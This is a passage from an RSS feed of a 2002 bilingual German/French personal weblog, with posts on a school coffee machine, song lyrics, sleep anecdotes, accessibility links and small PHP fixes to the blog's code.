  15730.    <description><![CDATA[Für alle die beim <a href=""><b>Gymnasium Thun-Schadau</b></a> den Kaffeeautomat benützen gibt die Anleitung zum superstarken, maximal aufweckenden und sauschlecht schmeckenden Kaffee:<br><br>- 80 Rappen einwerfen<br>- Option "Espresso" wählen (macht nur halb soviel Wasser rein -&gt; doppelt so stark ;-)<br>- den Knopf "Mehr Zucker" drücken, bis das Maximum ausgewählt ist<br>- den Knopf "Aufheller" drücken, bis das Minimum erreicht ist<br>- den Kaffee "Nescafe mit Zucker" auswählen (nicht verwechseln mit "Nescafe" !! ;-)<br><br>- Becher entnehmen und einen Schluck nehmen.<br>Für nicht routinierte Kaffeetrinker gilt: nicht ausspucken, auch wenn es einem den Mund zusammenzieht und nach Abwaschwasser schmeckt ;-P<br>Alle anderen können sich an ihrem aufweckenden Getränk erfreuen ;-)
  15731. ]]></description>
  15732.    <content:encoded><![CDATA[Für alle die beim <a href=""><b>Gymnasium Thun-Schadau</b></a> den Kaffeeautomat benützen gibt die Anleitung zum superstarken, maximal aufweckenden und sauschlecht schmeckenden Kaffee:<br><br>- 80 Rappen einwerfen<br>- Option "Espresso" wählen (macht nur halb soviel Wasser rein -&gt; doppelt so stark ;-)<br>- den Knopf "Mehr Zucker" drücken, bis das Maximum ausgewählt ist<br>- den Knopf "Aufheller" drücken, bis das Minimum erreicht ist<br>- den Kaffee "Nescafe mit Zucker" auswählen (nicht verwechseln mit "Nescafe" !! ;-)<br><br>- Becher entnehmen und einen Schluck nehmen.<br>Für nicht routinierte Kaffeetrinker gilt: nicht ausspucken, auch wenn es einem den Mund zusammenzieht und nach Abwaschwasser schmeckt ;-P<br>Alle anderen können sich an ihrem aufweckenden Getränk erfreuen ;-)
  15733. ]]></content:encoded>
  15734.  </item>
  15736.  <item>
  15737.    <title>Pour les Gamers</title>
  15738.    <link></link>
  15739.    <guid isPermaLink="true"></guid>
  15740.    <dc:creator>Andreas Jaggi</dc:creator>
  15741.    <creativeCommons:license></creativeCommons:license>
  15742.    <pubDate>Fri, 01 Nov 2002 16:53:00 +0100</pubDate>
  15743.    <category domain="">Tech</category>
  15744.    <description><![CDATA[<a href=""><b>Ici</b></a> on trouve un écran panorama ultimatif avec un ordinateur performante.
  15745. ]]></description>
  15746.    <content:encoded><![CDATA[<a href=""><b>Ici</b></a> on trouve un écran panorama ultimatif avec un ordinateur performante.
  15747. ]]></content:encoded>
  15748.  </item>
  15750.  <item>
  15751.    <title>Pochette Surprise</title>
  15752.    <link></link>
  15753.    <guid isPermaLink="true"></guid>
  15754.    <dc:creator>Andreas Jaggi</dc:creator>
  15755.    <creativeCommons:license></creativeCommons:license>
  15756.    <pubDate>Fri, 01 Nov 2002 16:37:00 +0100</pubDate>
  15757.    <category domain="">Misc</category>
  15758.    <description><![CDATA[<a href=""><b>Voilà</b></a> un autre weblog intéressant.
  15759. ]]></description>
  15760.    <content:encoded><![CDATA[<a href=""><b>Voilà</b></a> un autre weblog intéressant.
  15761. ]]></content:encoded>
  15762.  </item>
  15764.  <item>
  15765.    <title></title>
  15766.    <link></link>
  15767.    <guid isPermaLink="true"></guid>
  15768.    <dc:creator>Andreas Jaggi</dc:creator>
  15769.    <creativeCommons:license></creativeCommons:license>
  15770.    <pubDate>Fri, 01 Nov 2002 12:53:00 +0100</pubDate>
  15771.    <category domain="">Misc</category>
  15772.    <description><![CDATA['Heiss wie die Hölle, schwarz wie der Teufel , rein wie ein Engel und süss wie die Liebe' - so muss der Kaffee sein.<br><br>Charles Maurice Talleyrand<br><br><a href=""><b></b></a>
  15773. ]]></description>
  15774.    <content:encoded><![CDATA['Heiss wie die Hölle, schwarz wie der Teufel , rein wie ein Engel und süss wie die Liebe' - so muss der Kaffee sein.<br><br>Charles Maurice Talleyrand<br><br><a href=""><b></b></a>
  15775. ]]></content:encoded>
  15776.  </item>
  15778.  <item>
  15779.    <title>Large-Scale PHP Projects</title>
  15780.    <link></link>
  15781.    <guid isPermaLink="true"></guid>
  15782.    <dc:creator>Andreas Jaggi</dc:creator>
  15783.    <creativeCommons:license></creativeCommons:license>
  15784.    <pubDate>Fri, 01 Nov 2002 12:30:00 +0100</pubDate>
  15785.    <category domain="">Coding</category>
  15786.    <description><![CDATA[Bevor ich's wieder vergesse:<br><a href=""><b>Der Schockwellenreiter</b></a> hat einen interessanten <a href=""><b>Artikel</b></a> über das managen von grossen PHP Projekten gefunden.
  15787. ]]></description>
  15788.    <content:encoded><![CDATA[Bevor ich's wieder vergesse:<br><a href=""><b>Der Schockwellenreiter</b></a> hat einen interessanten <a href=""><b>Artikel</b></a> über das managen von grossen PHP Projekten gefunden.
  15789. ]]></content:encoded>
  15790.  </item>
  15792.  <item>
  15793.    <title>Nun geht's wieder</title>
  15794.    <link></link>
  15795.    <guid isPermaLink="true"></guid>
  15796.    <dc:creator>Andreas Jaggi</dc:creator>
  15797.    <creativeCommons:license></creativeCommons:license>
  15798.    <pubDate>Wed, 30 Oct 2002 17:42:00 +0100</pubDate>
  15799.    <category domain="">Coding</category>
  15800.    <description><![CDATA[Das Kommentarzeugs hat nicht mehr funktioniert, wie ihr vielleicht gemerkt habt. Grund dafür war ein Tippfehler im PHP-Code.<pre>$layout = new layout('plain', 1<span style="color: #ff0000">,</span>);</pre>funktioniert definitiv nicht.<br><br>Kommt davon, wenn man in der Geisterstunde am PHP-Code bastelt ;-)
  15801. ]]></description>
  15802.    <content:encoded><![CDATA[Das Kommentarzeugs hat nicht mehr funktioniert, wie ihr vielleicht gemerkt habt. Grund dafür war ein Tippfehler im PHP-Code.<pre>$layout = new layout('plain', 1<span style="color: #ff0000">,</span>);</pre>funktioniert definitiv nicht.<br><br>Kommt davon, wenn man in der Geisterstunde am PHP-Code bastelt ;-)
  15803. ]]></content:encoded>
  15804.  </item>
  15806.  <item>
  15807.    <title>--- One of a kind ---</title>
  15808.    <link></link>
  15809.    <guid isPermaLink="true"></guid>
  15810.    <dc:creator>Andreas Jaggi</dc:creator>
  15811.    <creativeCommons:license></creativeCommons:license>
  15812.    <pubDate>Wed, 30 Oct 2002 15:30:00 +0100</pubDate>
  15813.    <category domain="">Misc</category>
  15814.    <description><![CDATA[<a href=""><b>Ici</b></a> j'ai trouvé un autre weblog français.
  15815. ]]></description>
  15816.    <content:encoded><![CDATA[<a href=""><b>Ici</b></a> j'ai trouvé un autre weblog français.
  15817. ]]></content:encoded>
  15818.  </item>
  15820.  <item>
  15821.    <title>S'il vous intéresse</title>
  15822.    <link></link>
  15823.    <guid isPermaLink="true"></guid>
  15824.    <dc:creator>Andreas Jaggi</dc:creator>
  15825.    <creativeCommons:license></creativeCommons:license>
  15826.    <pubDate>Wed, 30 Oct 2002 00:48:00 +0100</pubDate>
  15827.    <category domain="">Misc</category>
  15828.    <description><![CDATA[<a href=""><b>Voilà</b></a> une capture de mon écran.<br>Pas très intéressante je sais ;-)
  15829. ]]></description>
  15830.    <content:encoded><![CDATA[<a href=""><b>Voilà</b></a> une capture de mon écran.<br>Pas très intéressante je sais ;-)
  15831. ]]></content:encoded>
  15832.  </item>
  15834.  <item>
  15835.    <title>Im Radio gehört</title>
  15836.    <link></link>
  15837.    <guid isPermaLink="true"></guid>
  15838.    <dc:creator>Andreas Jaggi</dc:creator>
  15839.    <creativeCommons:license></creativeCommons:license>
  15840.    <pubDate>Tue, 29 Oct 2002 22:32:00 +0100</pubDate>
  15841.    <category domain="">Music</category>
  15842.    <description><![CDATA[<a href=""><b>Kate Ryan - Désenchantée</b></a> ist leider eine Cover-Version von <a href=""><b>Mylene Farmer - Désenchatée</b></a>
  15843. ]]></description>
  15844.    <content:encoded><![CDATA[<a href=""><b>Kate Ryan - Désenchantée</b></a> ist leider eine Cover-Version von <a href=""><b>Mylene Farmer - Désenchatée</b></a>
  15845. ]]></content:encoded>
  15846.  </item>
  15848.  <item>
  15849.    <title>Un de plus</title>
  15850.    <link></link>
  15851.    <guid isPermaLink="true"></guid>
  15852.    <dc:creator>Andreas Jaggi</dc:creator>
  15853.    <creativeCommons:license></creativeCommons:license>
  15854.    <pubDate>Tue, 29 Oct 2002 20:32:00 +0100</pubDate>
  15855.    <category domain="">Misc</category>
  15856.    <description><![CDATA[J'ai ajouté <a href=""><b>le Shadow Blog</b></a> à ma liste des weblogs souvent visités.
  15857. ]]></description>
  15858.    <content:encoded><![CDATA[J'ai ajouté <a href=""><b>le Shadow Blog</b></a> à ma liste des weblogs souvent visités.
  15859. ]]></content:encoded>
  15860.  </item>
  15862.  <item>
  15863.    <title>Je vis dans la nuit</title>
  15864.    <link></link>
  15865.    <guid isPermaLink="true"></guid>
  15866.    <dc:creator>Andreas Jaggi</dc:creator>
  15867.    <creativeCommons:license></creativeCommons:license>
  15868.    <pubDate>Mon, 28 Oct 2002 22:47:00 +0100</pubDate>
  15869.    <category domain="">Misc</category>
  15870.    <description><![CDATA[Hier soir j'ai travaillé jusqu'à 04.45. Et je devais me lever à 05.05. Bon, à l'école je me suis présque endormi ;-)<br>Quand je suis arrivé à la maison à 2 heures le matin, je me suis endormi tout de suite et je me suis reveillé jusqu'avant quelques minutes ;-)<br><br>Je dors le jour et je vis la nuit ;-)<br><br><span style="text-decoration: line-through;">Corrécture:</span> <span style="color: #FF0000;">Correction:</span><br>C'était à 2 heures l'après-midi quand je me suis immédiatement endormi, pas à 2 heures le matin.
  15871. ]]></description>
  15872.    <content:encoded><![CDATA[Hier soir j'ai travaillé jusqu'à 04.45. Et je devais me lever à 05.05. Bon, à l'école je me suis présque endormi ;-)<br>Quand je suis arrivé à la maison à 2 heures le matin, je me suis endormi tout de suite et je me suis reveillé jusqu'avant quelques minutes ;-)<br><br>Je dors le jour et je vis la nuit ;-)<br><br><span style="text-decoration: line-through;">Corrécture:</span> <span style="color: #FF0000;">Correction:</span><br>C'était à 2 heures l'après-midi quand je me suis immédiatement endormi, pas à 2 heures le matin.
  15873. ]]></content:encoded>
  15874.  </item>
  15876.  <item>
  15877.    <title>Hehe</title>
  15878.    <link></link>
  15879.    <guid isPermaLink="true"></guid>
  15880.    <dc:creator>Andreas Jaggi</dc:creator>
  15881.    <creativeCommons:license></creativeCommons:license>
  15882.    <pubDate>Mon, 28 Oct 2002 22:09:00 +0100</pubDate>
  15883.    <category domain="">Misc</category>
  15884.    <description><![CDATA[Ich hab ja wegen dem <a href=""><b>Auftrag fürs Zeichnen</b></a> letzte Nacht nur gerade 20 Minuten geschlafen (von 4.45 bis 5.05 Uhr;). Dafür wars dann in der Schule umso lustiger (Ich muss die Augen offen halten.... Ich muss die Augen offenhalten ...). Bei den fünf Lektionen die wir hatten wars gerade noch so aushaltbar.<br>Natürlich hab ich dann auf der Heimfahrt im Zug einfach fast ne volle Stunde gepennt (die Leute werden sich gefragt haben, um 13 Uhr ;-). Zuhause angekommen wollte ich ja ein paar neue Features für mein Weblog einbauen. Nachdem der Computer mit den entsprechenden Programmen aufgestartet war, hab ich mich wirklich nur für 20 Sekunden hingelegt (um 14.30 Uhr).<br>Aufgewacht bin ich erst jetzt ;-)<br><br>Komischerweise hab ich, obwohl ich saumüde war, sehr viel geträumt; und zwar ausschliesslich von UT, Quake und so Zeugs :-)<br>Im Aufwachen hab ich mich noch gewundert, dass ich jetzt so schön geträumt habe. Nun stellte sich heraus, dass während der ganzen Zeit <a href=""><b>CrapRadio</b></a> am laufen war.<br>Logisch, dass ich vom Gamen träumte ;-)
  15885. ]]></description>
  15886.    <content:encoded><![CDATA[Ich hab ja wegen dem <a href=""><b>Auftrag fürs Zeichnen</b></a> letzte Nacht nur gerade 20 Minuten geschlafen (von 4.45 bis 5.05 Uhr;). Dafür wars dann in der Schule umso lustiger (Ich muss die Augen offen halten.... Ich muss die Augen offenhalten ...). Bei den fünf Lektionen die wir hatten wars gerade noch so aushaltbar.<br>Natürlich hab ich dann auf der Heimfahrt im Zug einfach fast ne volle Stunde gepennt (die Leute werden sich gefragt haben, um 13 Uhr ;-). Zuhause angekommen wollte ich ja ein paar neue Features für mein Weblog einbauen. Nachdem der Computer mit den entsprechenden Programmen aufgestartet war, hab ich mich wirklich nur für 20 Sekunden hingelegt (um 14.30 Uhr).<br>Aufgewacht bin ich erst jetzt ;-)<br><br>Komischerweise hab ich, obwohl ich saumüde war, sehr viel geträumt; und zwar ausschliesslich von UT, Quake und so Zeugs :-)<br>Im Aufwachen hab ich mich noch gewundert, dass ich jetzt so schön geträumt habe. Nun stellte sich heraus, dass während der ganzen Zeit <a href=""><b>CrapRadio</b></a> am laufen war.<br>Logisch, dass ich vom Gamen träumte ;-)
  15887. ]]></content:encoded>
  15888.  </item>
  15890.  <item>
  15891.    <title>TCPA / Palladium</title>
  15892.    <link></link>
  15893.    <guid isPermaLink="true"></guid>
  15894.    <dc:creator>Andreas Jaggi</dc:creator>
  15895.    <creativeCommons:license></creativeCommons:license>
  15896.    <pubDate>Mon, 28 Oct 2002 02:26:00 +0100</pubDate>
  15897.    <category domain="">Tech</category>
  15898.    <description><![CDATA[<a href=""><b>hier</b></a> gibts eine deutsche FAQ dazu.
  15899. ]]></description>
  15900.    <content:encoded><![CDATA[<a href=""><b>hier</b></a> gibts eine deutsche FAQ dazu.
  15901. ]]></content:encoded>
  15902.  </item>
  15904.  <item>
  15905.    <title>Noir Désir</title>
  15906.    <link></link>
  15907.    <guid isPermaLink="true"></guid>
  15908.    <dc:creator>Andreas Jaggi</dc:creator>
  15909.    <creativeCommons:license></creativeCommons:license>
  15910.    <pubDate>Sun, 27 Oct 2002 22:32:00 +0100</pubDate>
  15911.    <category domain="">Music</category>
  15912.    <description><![CDATA[<a href=""><b>The Holy Economic War</b></a><br><br>Woke up on the ground, i've thought "the earth is round"<br>so what about this new day on my way<br>is there anything new, what are we gonna do?<br>woke up in the silence then i've heard that song<br><br>and a voite said<br><br>   "this is not a bad joke<br>   this message's done for you<br>   you've got to work hard more<br>   and more<br>   for the holy economic war".<br><br>but it couldn't be no hallucinations<br>then i've read the story of the new nations<br>lord it's just as you please, i get down on my knees<br>god, it's wonderful to find the meaning of life<br><br>   "this is not a bad joke<br>   this message's done for you<br>   invade the whole world<br>   don't forget the new password<br><br>everbody sings you have<br><br>   no choice in the matter<br>   i'll become your blessed manager<br>   you've got to produce more and more<br>   for the holy economic war".<br><br>business force...<br>marketing...<br>careers...<br>success...<br><br>oh holy yeld, oh holy hell
  15913. ]]></description>
  15914.    <content:encoded><![CDATA[<a href=""><b>The Holy Economic War</b></a><br><br>Woke up on the ground, i've thought "the earth is round"<br>so what about this new day on my way<br>is there anything new, what are we gonna do?<br>woke up in the silence then i've heard that song<br><br>and a voite said<br><br>   "this is not a bad joke<br>   this message's done for you<br>   you've got to work hard more<br>   and more<br>   for the holy economic war".<br><br>but it couldn't be no hallucinations<br>then i've read the story of the new nations<br>lord it's just as you please, i get down on my knees<br>god, it's wonderful to find the meaning of life<br><br>   "this is not a bad joke<br>   this message's done for you<br>   invade the whole world<br>   don't forget the new password<br><br>everbody sings you have<br><br>   no choice in the matter<br>   i'll become your blessed manager<br>   you've got to produce more and more<br>   for the holy economic war".<br><br>business force...<br>marketing...<br>careers...<br>success...<br><br>oh holy yeld, oh holy hell
  15915. ]]></content:encoded>
  15916.  </item>
  15918.  <item>
  15919.    <title>In Extremo</title>
  15920.    <link></link>
  15921.    <guid isPermaLink="true"></guid>
  15922.    <dc:creator>Andreas Jaggi</dc:creator>
  15923.    <creativeCommons:license></creativeCommons:license>
  15924.    <pubDate>Sun, 27 Oct 2002 22:20:00 +0100</pubDate>
  15925.    <category domain="">Music</category>
  15926.    <description><![CDATA[<a href=""><b>SPIELMANNSFLUCH</b></a><br><br>Es war einmal ein König an Land und Dingen reich<br>Der saß auf seinem Throne finster und bleich<br>Was er sinnt ist Schrecken, was er blickt ist Wut<br>Was er spricht ist Geißel, was er schreibt ist Blut<br><br>Einst zog zu diesem Schlosse ein edles Sängerpaar<br>Einer hat schwarze Locken, der andre ist grau von Haar<br>Der Graue sprach zum Jungen: "Sei bereit mein Sohn,<br>Spiel die besten Lieder, stimm an den vollsten Ton!"<br><br>Es regnet, es regnet Blut<br>Es regnet den Spielmannsfluch<br><br>Es spielen die beiden Sänger im hohen Säulensaal<br>Auf dem Throne sitzt das Königspaar<br>Der König so prächtig wie blutiger Nordenschein<br>Die Königin so süß wie der Sonnenschein<br><br>Sie singen von Lenz, Liebe, Heiligkeit<br>Sie zerfloss in Wehmut, Lust war auch dabei<br>Ihr habt mein Volk geblendet, verlangt ihr nun mein Weib?<br>Der König schreit wütend, er bebt am ganzen Leib<br><br>Es regnet, es regnet Blut ...<br><br>Des Königs Schwert blitzend des Jünglings Brust durchdringt<br>Statt der goldnen Lieder nun ein Blutstrahl springt<br>Der Jüngling hat verröchelt in seines Meisters Arm<br>Dann schreit der Alte schaurig, der Marmorsaal zerspringt<br><br>Du verfluchter Mörder, du Fluch des Spielmanns Tun<br>Umsonst sei all dein Ringen, mit Blut befleckt dein Tun<br>Des Königs Namen meldet kein Lied, kein Heldenbuch<br>Versunken und vergessen- das ist des Spielmanns Fluch<br><br>Es regnet, es regnet Blut ...
  15927. ]]></description>
  15928.    <content:encoded><![CDATA[<a href=""><b>SPIELMANNSFLUCH</b></a><br><br>Es war einmal ein König an Land und Dingen reich<br>Der saß auf seinem Throne finster und bleich<br>Was er sinnt ist Schrecken, was er blickt ist Wut<br>Was er spricht ist Geißel, was er schreibt ist Blut<br><br>Einst zog zu diesem Schlosse ein edles Sängerpaar<br>Einer hat schwarze Locken, der andre ist grau von Haar<br>Der Graue sprach zum Jungen: "Sei bereit mein Sohn,<br>Spiel die besten Lieder, stimm an den vollsten Ton!"<br><br>Es regnet, es regnet Blut<br>Es regnet den Spielmannsfluch<br><br>Es spielen die beiden Sänger im hohen Säulensaal<br>Auf dem Throne sitzt das Königspaar<br>Der König so prächtig wie blutiger Nordenschein<br>Die Königin so süß wie der Sonnenschein<br><br>Sie singen von Lenz, Liebe, Heiligkeit<br>Sie zerfloss in Wehmut, Lust war auch dabei<br>Ihr habt mein Volk geblendet, verlangt ihr nun mein Weib?<br>Der König schreit wütend, er bebt am ganzen Leib<br><br>Es regnet, es regnet Blut ...<br><br>Des Königs Schwert blitzend des Jünglings Brust durchdringt<br>Statt der goldnen Lieder nun ein Blutstrahl springt<br>Der Jüngling hat verröchelt in seines Meisters Arm<br>Dann schreit der Alte schaurig, der Marmorsaal zerspringt<br><br>Du verfluchter Mörder, du Fluch des Spielmanns Tun<br>Umsonst sei all dein Ringen, mit Blut befleckt dein Tun<br>Des Königs Namen meldet kein Lied, kein Heldenbuch<br>Versunken und vergessen- das ist des Spielmanns Fluch<br><br>Es regnet, es regnet Blut ...
  15929. ]]></content:encoded>
  15930.  </item>
  15932.  <item>
  15933.    <title>Sachen gibt's</title>
  15934.    <link></link>
  15935.    <guid isPermaLink="true"></guid>
  15936.    <dc:creator>Andreas Jaggi</dc:creator>
  15937.    <creativeCommons:license></creativeCommons:license>
  15938.    <pubDate>Sun, 27 Oct 2002 21:14:00 +0100</pubDate>
  15939.    <category domain="">School</category>
  15940.    <description><![CDATA[Im Bildnerischen Gestalten (auch bekannt als Zeichnen;) dürfen wir <a href=""><b>dieses Kunstwerk</b></a> beschreiben. Und das auf <b>4</b> A4-Seiten (maschinengeschrieben, versteht sich)! Zudem dürfen wir auch noch fünf Piktogramme kreieren, die in einem Flüchtlingslager eingesetzt werden können, jeglicher Gebrauch von Schrift ist natürlich strengstens verboten.<br><br>Um den Lehrer nicht so schlecht dastehen zu lassen muss folgendes noch gesagt werden:<br>Für das ganze haben wir nun schon mehr als 2 Monate Zeit (inklusive 1 Monat Ferien) und wir haben während dieser Zeit das Zeichnen fehlen dürfen, um zu Hause am Computer zu arbeiten, weil die PC's in der Schule voll die Kacke sind ;-)
  15941. ]]></description>
  15942.    <content:encoded><![CDATA[Im Bildnerischen Gestalten (auch bekannt als Zeichnen;) dürfen wir <a href=""><b>dieses Kunstwerk</b></a> beschreiben. Und das auf <b>4</b> A4-Seiten (maschinengeschrieben, versteht sich)! Zudem dürfen wir auch noch fünf Piktogramme kreieren, die in einem Flüchtlingslager eingesetzt werden können, jeglicher Gebrauch von Schrift ist natürlich strengstens verboten.<br><br>Um den Lehrer nicht so schlecht dastehen zu lassen muss folgendes noch gesagt werden:<br>Für das ganze haben wir nun schon mehr als 2 Monate Zeit (inklusive 1 Monat Ferien) und wir haben während dieser Zeit das Zeichnen fehlen dürfen, um zu Hause am Computer zu arbeiten, weil die PC's in der Schule voll die Kacke sind ;-)
  15943. ]]></content:encoded>
  15944.  </item>
  15946.  <item>
  15947.    <title>Pour que je ne l'oublie pas</title>
  15948.    <link></link>
  15949.    <guid isPermaLink="true"></guid>
  15950.    <dc:creator>Andreas Jaggi</dc:creator>
  15951.    <creativeCommons:license></creativeCommons:license>
  15952.    <pubDate>Sun, 27 Oct 2002 02:57:00 +0100</pubDate>
  15953.    <category domain="">Misc</category>
  15954.    <description><![CDATA[<a href=""><b>BLOG shadow</b></a> est un journaux en français.
  15955. ]]></description>
  15956.    <content:encoded><![CDATA[<a href=""><b>BLOG shadow</b></a> est un journaux en français.
  15957. ]]></content:encoded>
  15958.  </item>
  15960.  <item>
  15961.    <title>J'écris aussi en français!</title>
  15962.    <link></link>
  15963.    <guid isPermaLink="true"></guid>
  15964.    <dc:creator>Andreas Jaggi</dc:creator>
  15965.    <creativeCommons:license></creativeCommons:license>
  15966.    <pubDate>Sun, 27 Oct 2002 02:38:00 +0100</pubDate>
  15967.    <category domain="">Webdesign</category>
  15968.    <description><![CDATA[J'ai annoncé <a href=""><b>ici</b></a> que j'écris maintenant aussi en français. Je le fais pour entraîner mes connaissances du français. <br><span style="color: #FF0000;">Le but c'est d'augmenter mes notes en français et en histoire bilingue</span>.<br><br>Voilà mon premier lien français: <a href=""><b></b></a> est une "agence de communication" situé à Paris avec une site très multimédiale ;-)
  15969. ]]></description>
  15970.    <content:encoded><![CDATA[J'ai annoncé <a href=""><b>ici</b></a> que j'écris maintenant aussi en français. Je le fais pour entraîner mes connaissances du français. <br><span style="color: #FF0000;">Le but c'est d'augmenter mes notes en français et en histoire bilingue</span>.<br><br>Voilà mon premier lien français: <a href=""><b></b></a> est une "agence de communication" situé à Paris avec une site très multimédiale ;-)
  15971. ]]></content:encoded>
  15972.  </item>
  15974.  <item>
  15975.    <title>Kleine Änderungen</title>
  15976.    <link></link>
  15977.    <guid isPermaLink="true"></guid>
  15978.    <dc:creator>Andreas Jaggi</dc:creator>
  15979.    <creativeCommons:license></creativeCommons:license>
  15980.    <pubDate>Sun, 27 Oct 2002 02:10:00 +0100</pubDate>
  15981.    <category domain="">Coding</category>
  15982.    <description><![CDATA[Ich hab wieder gebastelt ;-)<br>Nun ist es möglich für jeden Eintrag die Kommentarfunktion einzeln auszuschalten. Zudem hab ich vor, ab jetzt auch in Französisch zu schreiben, damit meine Franznote etwas besser wird durchs Üben. Daher hat sich MySQL-mässig auch da noch etwas geändert. Vielleicht werde ich einmal eine Abfrage mit Cookies oder so einrichten, mit der man dann nur eine Sprache anzeigen lassen kann; damit ihr nicht leiden müsst ;-)
  15983. ]]></description>
  15984.    <content:encoded><![CDATA[Ich hab wieder gebastelt ;-)<br>Nun ist es möglich für jeden Eintrag die Kommentarfunktion einzeln auszuschalten. Zudem hab ich vor, ab jetzt auch in Französisch zu schreiben, damit meine Franznote etwas besser wird durchs Üben. Daher hat sich MySQL-mässig auch da noch etwas geändert. Vielleicht werde ich einmal eine Abfrage mit Cookies oder so einrichten, mit der man dann nur eine Sprache anzeigen lassen kann; damit ihr nicht leiden müsst ;-)
  15985. ]]></content:encoded>
  15986.  </item>
  15988.  <item>
  15989.    <title>Des Rätsels Lösung</title>
  15990.    <link></link>
  15991.    <guid isPermaLink="true"></guid>
  15992.    <dc:creator>Andreas Jaggi</dc:creator>
  15993.    <creativeCommons:license></creativeCommons:license>
  15994.    <pubDate>Sun, 27 Oct 2002 00:04:00 +0200</pubDate>
  15995.    <category domain="">Coding</category>
  15996.    <description><![CDATA[Die Antwort auf die <a href=""><b>hier</b></a> gestellte Frage lautet:<br>Damit ich Google-Suchabfragen-Links erkennen kann, und mit <pre>header("Location: suche.php?q=".$GoogleQuery);</pre> umleiten kann. Weshalb das? Damit die Links von Google, welche manchmal auf Einträge zeigen, die nicht mehr auf der index.php sind, für den Benutzer doch etwas bringen.
  15997. ]]></description>
  15998.    <content:encoded><![CDATA[Die Antwort auf die <a href=""><b>hier</b></a> gestellte Frage lautet:<br>Damit ich Google-Suchabfragen-Links erkennen kann, und mit <pre>header("Location: suche.php?q=".$GoogleQuery);</pre> umleiten kann. Weshalb das? Damit die Links von Google, welche manchmal auf Einträge zeigen, die nicht mehr auf der index.php sind, für den Benutzer doch etwas bringen.
  15999. ]]></content:encoded>
  16000.  </item>
  16002.  <item>
  16003.    <title>Nun ist so wie's sein muss!</title>
  16004.    <link></link>
  16005.    <guid isPermaLink="true"></guid>
  16006.    <dc:creator>Andreas Jaggi</dc:creator>
  16007.    <creativeCommons:license></creativeCommons:license>
  16008.    <pubDate>Sat, 26 Oct 2002 15:13:00 +0200</pubDate>
  16009.    <category domain="">Webdesign</category>
  16010.    <description><![CDATA[<a href=""><b></b></a> ist nun XHTML 1.0 konform und in punkto Accessibility auch nicht schlecht gestellt.<br><br><a href=""><img src="" alt="Valid XHTML 1.0!" height="31" width="88"></a><br><br>Ich wäre froh, wenn jemand mit einer Software wie <a href="">JAWS</a> mal schauen könnte, ob noch Probleme darstellt.<br>Sonstige Accesibility-Tips sind natürlich auch willkommen ;-)
  16011. ]]></description>
  16012.    <content:encoded><![CDATA[<a href=""><b></b></a> ist nun XHTML 1.0 konform und in punkto Accessibility auch nicht schlecht gestellt.<br><br><a href=""><img src="" alt="Valid XHTML 1.0!" height="31" width="88"></a><br><br>Ich wäre froh, wenn jemand mit einer Software wie <a href="">JAWS</a> mal schauen könnte, ob noch Probleme darstellt.<br>Sonstige Accesibility-Tips sind natürlich auch willkommen ;-)
  16013. ]]></content:encoded>
  16014.  </item>
  16016.  <item>
  16017.    <title>Accessibility zum 2.</title>
  16018.    <link></link>
  16019.    <guid isPermaLink="true"></guid>
  16020.    <dc:creator>Andreas Jaggi</dc:creator>
  16021.    <creativeCommons:license></creativeCommons:license>
  16022.    <pubDate>Fri, 25 Oct 2002 00:47:00 +0200</pubDate>
  16023.    <category domain="">Webdesign</category>
  16024.    <description><![CDATA[Nun ist <a href=""><b></b></a> HTML 4.01 und CSS 2 konform. Zudem hab ich mich durch den <a href=""><b>Dive into Accessibility</b></a> Guide gewühlt und einige Sachen daraus entnommen. Nur das Kontakt-Formular und die Abkürzungen müssen noch bearbeitet werden.<br>Ergänzungen?<br><br><a href=""><img src="" alt="Valid HTML 4.01!" height="31" width="88"></a>  <a href=""><img style="border:0;width:88px;height:31px" src="" alt="Valid CSS!"></a>
  16025. ]]></description>
  16026.    <content:encoded><![CDATA[Nun ist <a href=""><b></b></a> HTML 4.01 und CSS 2 konform. Zudem hab ich mich durch den <a href=""><b>Dive into Accessibility</b></a> Guide gewühlt und einige Sachen daraus entnommen. Nur das Kontakt-Formular und die Abkürzungen müssen noch bearbeitet werden.<br>Ergänzungen?<br><br><a href=""><img src="" alt="Valid HTML 4.01!" height="31" width="88"></a>  <a href=""><img style="border:0;width:88px;height:31px" src="" alt="Valid CSS!"></a>
  16027. ]]></content:encoded>
  16028.  </item>
  16030.  <item>
  16031.    <title>Accessibility!</title>
  16032.    <link></link>
  16033.    <guid isPermaLink="true"></guid>
  16034.    <dc:creator>Andreas Jaggi</dc:creator>
  16035.    <creativeCommons:license></creativeCommons:license>
  16036.    <pubDate>Thu, 24 Oct 2002 22:50:00 +0200</pubDate>
  16037.    <category domain="">Webdesign</category>
  16038.    <description><![CDATA[Damit ja niemandem langweilig wird:<br><br><a href=""><b>Accessible Web Page Design</b></a><br>
  16039. <a href=""><b>AWARE</b></a><br>
  16040. <a href=""><b>IBM Accessibility Center</b></a><br>
  16041. <a href=""><b>Weblog Accessibility</b></a><br>
  16042. <a href=""><b>Joe Clark: Media Access</b></a><br>
  16043. <a href=""><b>Web Accessibility for Section 508</b></a><br>
  16044. <a href=""><b>NCI Web Accessibility and 508 Compliance Initiative</b></a><br>
  16045. <a href=""><b>Accessible Web design - a definition</b></a><br>
  16046. <a href=""><b>Usable Web</b></a><br>
  16047. <a href=""><b>Accessible Web Design </b></a><br>
  16048. <a href=""><b>Web Accessibility - ADA Guidelines</b></a><br>
  16049. <a href=""><b>Accessible Web Page Design Curriculum</b></a><br>
  16050. <a href=""><b>Dive Into Accessibility</b></a>
  16051. ]]></description>
  16052.    <content:encoded><![CDATA[Damit ja niemandem langweilig wird:<br><br><a href=""><b>Accessible Web Page Design</b></a><br>
  16053. <a href=""><b>AWARE</b></a><br>
  16054. <a href=""><b>IBM Accessibility Center</b></a><br>
  16055. <a href=""><b>Weblog Accessibility</b></a><br>
  16056. <a href=""><b>Joe Clark: Media Access</b></a><br>
  16057. <a href=""><b>Web Accessibility for Section 508</b></a><br>
  16058. <a href=""><b>NCI Web Accessibility and 508 Compliance Initiative</b></a><br>
  16059. <a href=""><b>Accessible Web design - a definition</b></a><br>
  16060. <a href=""><b>Usable Web</b></a><br>
  16061. <a href=""><b>Accessible Web Design </b></a><br>
  16062. <a href=""><b>Web Accessibility - ADA Guidelines</b></a><br>
  16063. <a href=""><b>Accessible Web Page Design Curriculum</b></a><br>
  16064. <a href=""><b>Dive Into Accessibility</b></a>
  16065. ]]></content:encoded>
  16066.  </item>
  16068.  <item>
  16069.    <title>Ich bin reich!</title>
  16070.    <link></link>
  16071.    <guid isPermaLink="true"></guid>
  16072.    <dc:creator>Andreas Jaggi</dc:creator>
